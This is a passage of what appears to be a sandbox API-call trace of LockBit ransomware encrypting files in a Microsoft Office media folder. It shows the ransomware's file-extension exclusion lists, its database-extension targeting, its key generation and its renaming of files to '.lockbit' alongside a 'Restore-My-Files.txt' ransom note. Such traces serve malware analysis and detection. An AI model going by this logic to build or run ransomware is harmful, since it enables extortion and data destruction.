lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21307_.GIF") returned 1 [0209.644] lstrcmpiW (lpString1="ntldr", lpString2="BD21307_.GIF") returned 1 [0209.644] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21307_.GIF") returned 1 [0209.644] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21307_.GIF") returned 1 [0209.644] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21307_.GIF") returned -1 [0209.644] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21307_.GIF") returned 1 [0209.644] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21307_.GIF") returned 1 [0209.644] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.644] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF") returned=".GIF" [0209.644] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.645] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.645] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.645] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF.lockbit") returned 76 [0209.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21307_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0209.647] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.647] malloc (_Size=0x40068) returned 0x1ff1e60 [0209.647] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=808) returned 1 [0209.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0209.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0209.648] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.651] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.651] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.651] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.652] free (_Block=0x1fa2ed8) [0209.652] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21307_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.652] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.652] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.652] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56009300, ftCreationTime.dwHighDateTime=0x1bd4f53, ftLastAccessTime.dwLowDateTime=0xbcd56820, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x56009300, ftLastWriteTime.dwHighDateTime=0x1bd4f53, nFileSizeHigh=0x0, nFileSizeLow=0xd1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21309_.GIF", cAlternateFileName="")) returned 1 [0209.652] lstrcmpiW (lpString1=".", lpString2="BD21309_.GIF") returned -1 [0209.652] lstrcmpiW (lpString1="..", lpString2="BD21309_.GIF") returned -1 [0209.652] PathFindExtensionW (pszPath="BD21309_.GIF") returned=".GIF" [0209.653] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.653] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.653] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.654] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.654] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.654] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21309_.GIF") returned 1 [0209.654] lstrcmpiW (lpString1="ntldr", lpString2="BD21309_.GIF") returned 1 [0209.654] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21309_.GIF") returned 1 [0209.654] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21309_.GIF") returned 1 [0209.654] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21309_.GIF") returned -1 [0209.662] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21309_.GIF") returned 1 [0209.662] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21309_.GIF") returned 1 [0209.662] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.662] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF") returned=".GIF" [0209.662] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.662] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.662] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.663] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.663] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.663] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF.lockbit") returned 76 [0209.663] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21309_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.664] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.665] malloc (_Size=0x40068) returned 0x3d70450 [0209.665] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3357) returned 1 [0209.665] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0209.665] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0209.665] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0209.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.672] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.672] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.672] free (_Block=0x1fa2ed8) [0209.672] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21309_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.673] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.673] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.673] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d745b00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd56820, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3d745b00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x901, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21311_.GIF", cAlternateFileName="")) returned 1 [0209.673] lstrcmpiW (lpString1=".", lpString2="BD21311_.GIF") returned -1 [0209.673] lstrcmpiW (lpString1="..", lpString2="BD21311_.GIF") returned -1 [0209.673] PathFindExtensionW (pszPath="BD21311_.GIF") returned=".GIF" [0209.673] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.673] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.673] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.674] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.674] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.674] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21311_.GIF") returned 1 [0209.674] lstrcmpiW (lpString1="ntldr", lpString2="BD21311_.GIF") returned 1 [0209.674] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21311_.GIF") returned 1 [0209.674] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21311_.GIF") returned 1 [0209.674] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21311_.GIF") returned -1 [0209.674] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21311_.GIF") returned 1 [0209.674] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21311_.GIF") returned 1 [0209.674] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.674] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF") returned=".GIF" [0209.674] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.674] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.674] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.674] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.675] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.675] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.675] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF.lockbit") returned 76 [0209.675] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21311_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.676] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.676] malloc (_Size=0x40068) returned 0x3df0008 [0209.676] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2305) returned 1 [0209.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.677] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.679] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.679] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.680] free (_Block=0x1fa2ed8) [0209.680] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21311_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.680] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: 